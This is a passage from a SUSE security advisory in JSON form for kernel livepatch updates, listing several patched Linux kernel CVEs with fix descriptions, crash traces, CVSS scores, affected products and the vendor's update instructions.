"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T14:04:13Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-40284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: MGMT: cancel mesh send timer when hdev removed\n\nmesh_send_done timer is not canceled when hdev is removed, which causes\ncrash if the timer triggers after hdev is gone.\n\nCancel the timer when MGMT removes the hdev, like other MGMT timers.\n\nShould fix the BUG: sporadically seen by BlueZ test bot\n(in \"Mesh - Send cancel - 1\" test).\n\nLog:\n------\nBUG: KASAN: slab-use-after-free in run_timer_softirq+0x76b/0x7d0\n...\nFreed by task 36:\n kasan_save_stack+0x24/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3a/0x60\n __kasan_slab_free+0x43/0x70\n kfree+0x103/0x500\n device_release+0x9a/0x210\n kobject_put+0x100/0x1e0\n vhci_release+0x18b/0x240\n------",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40284",
"url": "https://www.suse.com/security/cve/CVE-2025-40284"
},
{
"category": "external",
"summary": "SUSE Bug 1254860 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1254860"
},
{
"category": "external",
"summary": "SUSE Bug 1257669 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1257669"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T14:04:13Z",
"details": "important"
}
],
"title": "CVE-2025-40284"
},
{
"cve": "CVE-2025-40297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: fix use-after-free due to MST port state bypass\n\nsyzbot reported[1] a use-after-free when deleting an expired fdb. It is\ndue to a race condition between learning still happening and a port being\ndeleted, after all its fdbs have been flushed. The port\u0027s state has been\ntoggled to disabled so no learning should happen at that time, but if we\nhave MST enabled, it will bypass the port\u0027s state, that together with VLAN\nfiltering disabled can lead to fdb learning at a time when it shouldn\u0027t\nhappen while the port is being deleted. VLAN filtering must be disabled\nbecause we flush the port VLANs when it\u0027s being deleted which will stop\nlearning. This fix adds a check for the port\u0027s vlan group which is\ninitialized to NULL when the port is getting deleted, that avoids the port\nstate bypass. When MST is enabled there would be a minimal new overhead\nin the fast-path because the port\u0027s vlan group pointer is cache-hot.\n\n[1] https://syzkaller.appspot.com/bug?extid=dd280197f0f7ab3917be",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40297",
"url": "https://www.suse.com/security/cve/CVE-2025-40297"
},
{
"category": "external",
"summary": "SUSE Bug 1255187 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255187"
},
{
"category": "external",
"summary": "SUSE Bug 1255895 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255895"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T14:04:13Z",
"details": "important"
}
],
"title": "CVE-2025-40297"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T14:04:13Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n 
entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T14:04:13Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. 
fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_53-default-13-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_51-default-12-150700.3.33.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T14:04:13Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
